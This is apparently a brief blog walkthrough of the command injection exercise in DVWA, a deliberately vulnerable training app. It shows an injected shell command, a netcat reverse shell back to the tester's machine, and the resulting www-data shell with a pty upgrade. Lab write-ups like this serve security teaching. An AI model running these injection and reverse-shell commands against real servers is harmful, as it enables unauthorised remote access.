Saturday, February 8, 2020

DVWA: Command Injection

Our goal is to successfully exploit the command injection vulnerability and get local shell access on the remote host.

127.0.0.1;id

As you can see we are able to execute commands on the remote server. Lets next move on to getting a connect back shell using netcat.

nc -e /bin/sh 192.168.56.1 8088

As you can see we got a successful connect back and local system shell on the remote host.

sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 40718 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ 

No comments:

Post a Comment

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...